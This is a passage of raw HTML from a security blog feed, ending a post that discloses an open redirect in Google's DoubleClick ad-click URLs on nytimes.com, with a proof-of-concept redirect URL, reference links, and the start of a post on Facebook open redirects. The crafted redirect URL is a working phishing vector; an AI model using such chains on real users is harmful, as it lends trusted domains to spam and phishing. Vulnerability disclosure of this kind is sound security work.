target="_blank">http://www.nytimes.com/adx/<wbr></wbr>bin/adx_click.html?type=goto&<wbr></wbr>opzn&page=www.nytimes.com/<wbr></wbr>pages/nyregion/index.html&pos=<wbr></wbr>SFMiddle&sn2=8dfce1f6/<wbr></wbr>9926f9b3&sn1=bbba504f/<wbr></wbr>c0de9221&camp=CouplesResorts_<wbr></wbr>1918341&ad=NYRegionSF_Feb_<wbr></wbr>300x250-B5732328.10663001&<wbr></wbr>goto=http%3A%2F%2Fad%<wbr></wbr>2Edoubleclick%2Enet%2Fddm%<wbr></wbr>2Fclk%2F279541164%3B106630011%<wbr></wbr>3Bs%3Fhttp%3A%2F%2Ffacebook%<wbr></wbr>2Ecom%2Fall%2Dinclusive%2Ephp%<wbr></wbr>3Futm%5Fsource%3Dnyt%26utm%<wbr></wbr>5Fmedium%3Ddisplay%26utm%<wbr></wbr>5Fcontent%3Dclicktracker%<wbr></wbr>26utm%5Fcampaign%3D300x250%<wbr></wbr>5FExpectMore%5FNYT%5FNYRegion</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">POC:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=www.nytimes.com/pages/nyregion/index.html&pos=SFMiddle&sn2=8dfce1f6/9926f9b3&sn1=bbba504f/c0de9221&camp=CouplesResorts_1918341&ad=NYRegionSF_Feb_300x250-B5732328.10663001&goto=http%3A%2F%2Fad%2Edoubleclick%2Enet%2Fddm%2Fclk%2F279541164%3B106630011%3Bs%3Fhttp%3A%2F%2Ftetraph%2Ecom%2Fsecurity%3F%2Dinclusive%2Ephp%3Futm%5Fsource%3Dnyt%26utm%5Fmedium%3Ddisplay%26utm%5Fcontent%3Dclicktracker%26utm%5Fcampaign%3D300x250%5FExpectMore%5FNYT%5FNYRegion" style="background-color: white;" target="_blank">http://www.nytimes.com/adx/<wbr></wbr>bin/adx_click.html?type=goto&<wbr></wbr>opzn&page=www.nytimes.com/<wbr></wbr>pages/nyregion/index.html&pos=<wbr></wbr>SFMiddle&sn2=8dfce1f6/<wbr></wbr>9926f9b3&sn1=bbba504f/<wbr></wbr>c0de9221&camp=CouplesResorts_<wbr></wbr>1918341&ad=NYRegionSF_Feb_<wbr></wbr>300x250-B5732328.10663001&<wbr></wbr>goto=http%3A%2F%2Fad%<wbr></wbr>2Edoubleclick%2Enet%2Fddm%<wbr></wbr>2Fclk%2F279541164%3B106630011%<wbr></wbr>3Bs%3Fhttp%3A%2F%2Ftetraph%<wbr></wbr>2Ecom%2Fsecurity%3F%<wbr></wbr>2Dinclusive%2Ephp%3Futm%<wbr></wbr>5Fsource%3Dnyt%26utm%5Fmedium%<wbr></wbr>3Ddisplay%26utm%5Fcontent%<wbr></wbr>3Dclicktracker%26utm%<wbr></wbr>5Fcampaign%3D300x250%<wbr></wbr>5FExpectMore%5FNYT%5FNYRegion</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">More Details:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Video:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="https://www.youtube.com/watch?v=3XtrUqzxNW0" style="background-color: white;" target="_blank">https://www.youtube.com/watch?<wbr></wbr>v=3XtrUqzxNW0</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">Blog:</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><a href="http://computerobsess.blogspot.com/2014/11/nytimes-covert-redirect-vulnerability.html" style="background-color: white;" target="_blank">http://computerobsess.<wbr></wbr>blogspot.com/2014/11/nytimes-<wbr></wbr>covert-redirect-vulnerability.<wbr></wbr>html</a></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;">These
vulnerabilities were reported to Google earlier in 2014. But it seems
that Google has yet taken any actions. All of the vulnerabilities are
still not patched.</span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="line-height: 20.7900009155273px;">
<div style="line-height: 28px; margin: 0px; padding: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif; font-size: small;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><span style="font-size: small;"><br /></span></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;"><br /></b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif; font-size: small;"><b style="background-color: white;">Related Posts:</b></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: #500050; font-family: arial, sans-serif; font-size: 12.6666669845581px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://seclists.org/fulldisclosure/2014/Nov/28"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/fulldisclosure/2014/Nov/28</span></a></div>
</div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://cxsecurity.com/issue/WLB-2014110106"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">https://cxsecurity.com/issue/WLB-2014110106</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1192">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1192</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01307.html"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">https://www.mail-archive.com/fulldisclosure%40seclists.org/msg01307.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://computerobsess.blogspot.com/2014/11/google-doubleclicknetadvertising-system.html"><span style="background-color: white; color: black; font-family: Arial, Helvetica, sans-serif;">http://computerobsess.blogspot.com/2014/11/google-doubleclicknetadvertising-system.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><a href="http://www.techenet.com/2014/12/doubleclick-do-google-pode-ser-vulneravel-a-ataques/">http://www.techenet.com/2014/12/doubleclick-do-google-pode-ser-vulneravel-a-ataques/</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://computertechhut.wordpress.com/2014/11/12/google-doubleclick-spam/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://computertechhut.wordpress.com/2014/11/12/google-doubleclick-spam/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://mathpost.tumblr.com/post/120760828940/tetraph-google-doubleclick-net-advertising"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://mathpost.tumblr.com/post/120760828940/tetraph-google-doubleclick-net-advertising</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><a href="http://tetraph.com/security/open-redirect/google-doubleclick-netadvertising-system-url-redirection-vulnerabilities-can-be-used-by-spammers/" target="_blank">http://tetraph.com/security/<wbr></wbr>open-redirect/google-<wbr></wbr>doubleclick-netadvertising-<wbr></wbr>system</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://www.facebook.com/essayjeans/posts/838922772865543"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://www.facebook.com/essayjeans/posts/838922772865543</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://plus.google.com/u/0/+essayjeans/posts/Y12x6gXfyFX"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://plus.google.com/u/0/+essayjeans/posts/Y12x6gXfyFX</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://mathstopic.blogspot.com/2015/06/google-doubleclick-spam.html"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://mathstopic.blogspot.com/2015/06/google-doubleclick-spam.html</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://itsecurity.lofter.com/post/1cfbf9e7_72fe79f"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://itsecurity.lofter.com/post/1cfbf9e7_72fe79f</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://twitter.com/essayjeans/status/606726247578636288"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://twitter.com/essayjeans/status/606726247578636288</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://tetraph.tumblr.com/post/120760676767/google-doubleclick-net-advertising-system-url"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://tetraph.tumblr.com/post/120760676767/google-doubleclick-net-advertising-system-url</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="https://itinfotechnology.wordpress.com/2014/11/18/google-doubleclick-spam/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://itinfotechnology.wordpress.com/2014/11/18/google-doubleclick-spam/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/permalink.php?story_fbid=945171075538075&id=874373602617823">https://www.facebook.com/permalink.php?story_fbid=945171075538075</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://guyuzui.lofter.com/post/1ccdcda4_7305f25"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://guyuzui.lofter.com/post/1ccdcda4_7305f25</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><a href="http://tetraph.blog.163.com/blog/static/23460305120155534216326/">http://tetraph.blog.163.com/blog/static/23460305120155534216326/</a></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<a href="http://www.inzeed.com/kaleidoscope/spamming/google-doubleclick-spam/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://www.inzeed.com/kaleidoscope/spamming/google-doubleclick-spam/</span></a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="background-color: white; font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
</div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-6322800700334987667.post-55809968514787657122015-06-04T21:55:00.000-07:002015-06-04T21:55:01.897-07:00Facebook Old Generated URLs Still Vulnerable to Open Redirect Attacks & A New Open Redirect Web Security Bugs<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRMCAL42Kzk81-PAZ3_OC_Pg8N0DPCIypHTkh6FzLyd2Y3ZOqlnd-ZAS4WjhLNkRKIaMWdnH_Rin7HbzqNuGFQR9TPpfU_BxH1wNOEckqOrmdqnT8I67p6Ss2EaWbmgMBpXevdbnhw64PI/s1600/Facebook_2482983b.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="248" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjRMCAL42Kzk81-PAZ3_OC_Pg8N0DPCIypHTkh6FzLyd2Y3ZOqlnd-ZAS4WjhLNkRKIaMWdnH_Rin7HbzqNuGFQR9TPpfU_BxH1wNOEckqOrmdqnT8I67p6Ss2EaWbmgMBpXevdbnhw64PI/s400/Facebook_2482983b.jpg" width="400" /></a></div>
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
